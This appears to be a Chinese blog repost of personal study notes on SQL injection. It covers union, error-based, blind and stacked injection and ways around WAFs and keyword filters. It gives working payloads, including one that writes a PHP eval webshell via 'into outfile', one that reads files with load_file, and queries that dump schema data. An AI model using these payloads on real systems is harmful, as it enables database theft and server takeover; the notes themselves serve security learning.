当前位置:   article > 正文

web安全学习笔记--sql基础下(sql注入)_sql注入if可以被什么函数代替

sql注入if可以被什么函数代替

目录

一、SQL函数

二、SQL注入类型

2-1 字符及整数型注入

2-2 报错注入

2-3 布尔及时间盲注

2-4 堆叠注入

三、WAF绕过及关键词过滤

关键词绕过

WAF绕过

sql-quine


一、SQL函数

1-1 读取函数以及导出函数(要求有读写权限以及文件绝对路径

load_file()函数可用于读取敏感文件,into outfile/dumofile导出函数可用于写webshell

  1. 读配置文件:1' union select 1,2,load_file(/var/www/html/xxx.com/.user.ini)#
  2. 写webshell:1' union select <?php eval($_POST['pwd'])?> into outfile '绝对路径'#

1-2 常见函数:concat(用于连接字符串),group_concat(联合返回执行结果),count(返回指定匹配条件的数目),floor(取整),as(取别名,一般用于绕过),group by(用于结合合计函数,根据一个或多个列对结果集进行分组),rename(重命名,要与as区分开,可用于堆叠绕过),rand(取随机数,内含种子)、prepare(定义预处理语句)、execute(执行预处理语句)

二、SQL注入类型

2-1 字符及整数型注入

注入过程:1.判断是否有注入点:and 、or 、xor等逻辑条件错误来判断

2.爆列数(order by):页面报错时即为前一列的数目

3.判断回显列:union select 1,2,3,...(列数),观察页面回显了哪个数字

4.判断用户权限、数据库和数据库版本:在有回显的列数替换user()--返回用户;version()--返回数据库版本;database()--返回数据库

5.爆表名(mysql版本低于5.x的采用爆破):高于5.x版本MySQL自带information_schema数据库,里面包含了tables表--记录所有表名和columns表--记录所有列名,union select 1,group_concat(table_name),3... from information_schema.tables where table_schema=database();

注意:group_concat将查询的所有数据集返回,如果要单条返回可使用LIMIT 0,1(0为返回的序号,从0开始计算为第一行;1为一次返回的行数);from代指查询来源于information_schema的tables表,因为是跨库查询(tables表在information_schema下,只有高权限才能操作)所以要加入查询的数据库;where代指查询条件为当前数据库的表

6.爆列名:union select 1,group_concat(column_name),3... from information_schema.columns where table_schema='<表名>';记得加引号

7.爆数据:union select 1,group_concat(<列名>),3... from <表名>;不用加引号

2-2 报错注入

涉及函数:mid(字符串数据,开始截取位置,结束截取位置):从中间截取一段数据并输出,left(字符串数据,截取长度):从左开始截取一段数据并输出,right(字符串数据,截取长度):从右开始截取一段数据并输出

        1.group by报错: 原理是键名冲突,语句为' union select 1,count(*),concat(floor(rand(0)*2),(sql语句))x from information_schema.tables group by x --+;

个人理解的大概原理:floor(rand(0)*2)产生一串有规律的0和1的整数的数据,group by在进行数据整合插入表中时产生键名冲突,从而通过concat联合报错出数据库以及其他信息

2.updatexml:xpath文档报错,语句为or updatexml(1,concat(0x7e,(sql语句),0x7e),1)

 0x7e为~符号,将其加入只是方便辨别数据

3.extractvalue:和updatexml类似,语句为' and extractvalue(1,concat(0x7e,(sql语句),0x7e))

注意: group by输出的数据更完整,updatexml和extractvalue这两种报错输出的数据有长度限制,当利用limit单行输出时单行数据依旧不全可以考虑第一种或者使用right,mid,left函数让数据从不同位置开始输出

2-3 布尔及时间盲注

涉及函数:if(判断条件,为真执行语句,为假执行语句),substr(字符串数据,开始位置,截取长度),ascii(获取该字符的ASCII码)与char()函数相反,sleep(休眠时间),length(获取数据长度)

1.布尔盲注:针对页面不回显,通过页面返回数据是否正常判断结果是否正确,例如if(length(database()) = 6,1,0),当数据库长度为6时,页面返回正常

大致过程

  1. 判断长度:if(length(database())=$1$,1,0)
  2. 爆库名:if(ascii(substr(concat(database()),$1$,1))=$97$,1,0)
  3. 判断表名长度:if(length(select table_name from information_schema.tables where table_schema=database() limit $0$,1)=$1$,1,0)
  4. 爆表名:if(ascii(substr(concat(select table_name from information_schema.tables where table_schema=database() limit 0,1),$1$,1))=$97$,1,0)
  5. ...............
  6. ...............
  7. ...............
  8. 其余步骤类似,$$代表变量

2.时间盲注:和布尔类似,只不过页面内容不会改变,将判断成功的执行语句替换为sleep,根据页面延时判断

2-4 堆叠注入

堆叠注入指一行可以执行多个sql语句,在特殊情况下利用多个语句的拼接可达到绕过防火墙的作用,比如prepare和execute配合:set @sql=<要执行的语句>;prepare aaa from @sql;execute aaa;

三、WAF绕过及关键词过滤

关键词绕过

3-1 空格绕过:内联符/**/代替,括号()代替,url编码%20代替,特殊空格字符编码%a0和%7f代替,sql特性/*!*/绕过,换行符%0a绕过,连接符SQL server为+、oracle为||、MYSQL为空格绕过

3-2 关键词过滤绕过:双写绕过 -- 针对一次关键词替换为空过滤,<>绕过 -- 部分数据库有效

3-3 反序列化绕过:sql拼接反序列化数据进行绕过

3-4 关键词替换:=可替换为like或者正则regexp(),verision()类可替换@@version,and可以与or替换,or可替换||,and替换&&,if替换0^(异或),group by替换order by过滤,sys.schema_auto_increment_columns // sys.schema_table_statistics_with_buffer//mysql.innodb_table_stats//mysql.innodb_table_index可替换information_schema过滤

WAF绕过

3-5 fuzz测试:利用大量fuzz生成的字典进行爆破绕过

3-6 sql特性:sql语句select id/*!55555,username*/ from users:意思是mysql版本高于5.55.55,语句将被执行

3-7 url编码,16进制编码绕过:针对只对关键词内容检测,不对数据内容检测的过滤绕过

3-8 Handler语句替换:可以在堆叠注入的条件下使用该语法替换select,格式为:handler open <表名>;handle read first <表名>;handle close <表名>

3-9 参数污染:利用web服务器接收参数的顺序导致漏洞,例如:apeche+php默认接收最后一位参数->?id=/**&id=1 select 1,2,3#*/,程序接收的参数为1 select 1,2,3#*/,而waf匹配的语句是/**&id=1 select 1,2,3#*/默认被注释所以不过滤

3-10 %0A截断配合注释符:绕过单行匹配->union%23a%0Aselect 1,2,3#,在系统执行语句时换行符并不会中断语句,它是以;来判断语句结束的

 

 3-11 database过滤:使用未知表名查询报错

3-12 MD5绕过:用哈希碰撞出对应编码,比如ffifdyop这个万能密码,它经过MD5加密以及sql编码后为'or'6xx,使条件恒成立

sql-quine


后续学习更新

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家自动化/article/detail/139282
推荐阅读
相关标签
  

闽ICP备14008679号